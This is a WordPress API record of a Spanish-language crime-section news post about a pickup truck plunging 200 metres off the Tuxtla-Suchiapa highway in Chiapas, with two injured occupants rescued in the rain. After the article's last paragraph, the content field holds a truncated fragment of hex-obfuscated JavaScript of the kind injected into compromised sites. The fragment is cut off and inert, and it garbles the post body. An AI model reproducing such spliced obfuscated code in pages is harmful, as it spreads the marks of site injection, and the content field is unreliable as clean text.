{"id":11560,"date":"2023-08-29T01:52:17","date_gmt":"2023-08-29T01:52:17","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11560"},"modified":"2023-08-29T01:52:17","modified_gmt":"2023-08-29T01:52:17","slug":"camioneta-se-va-al-voladero-en-el-tramo-tuxtla-suchiapa","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11560","title":{"rendered":"Camioneta se va al voladero en el tramo Tuxtla-Suchiapa"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"769\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1693273823523-1024x769.jpg\" alt=\"\" class=\"wp-image-11561\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1693273823523-1024x769.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1693273823523-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1693273823523-768x577.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1693273823523.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudano, 28 de agosto del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este lunes por la tarde se registr\u00f3 un fuerte accidente en el tramo Tuxtla-Suchiapa cuando una camioneta se fue a un voladero de 200 metros, a la altura del kil\u00f3metro 11.Los reportes oficiales informaron que, al lugar arribaron elementos polic\u00edacos quienes a primera vista no localizaban la unidad.En el sitio algunos lugare\u00f1os indicaron que, la unidad estaba hasta el fondo.Al lugar arribaron elementos de Bomberos y de Protecci\u00f3n Civil quienes descendieron para buscar la unidad o los ocupantes.Al bajar localizaron al conductor y el copiloto lesionados quienes fueron sacados con equipo especializado y trasladarlos a un hospital para su atenci\u00f3n m\u00e9dica especializada.La lluvia complic\u00f3 el rescate de la unidad que qued\u00f3 convertida en chatarra.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudano, 28 de agosto del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este lunes por la tarde se registr\u00f3 un fuerte accidente en el tramo Tuxtla-Suchiapa cuando una camioneta se fue a un voladero de 200 metros, a la altura del kil\u00f3metro 11.Los reportes oficiales informaron que, al lugar arribaron elementos polic\u00edacos quienes a primera vista &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11561,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-11560","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11560","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11560"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11560\/revisions"}],"predecessor-version":[{"id":11562,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11560\/revisions\/11562"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11561"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11560"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11560"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11560"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}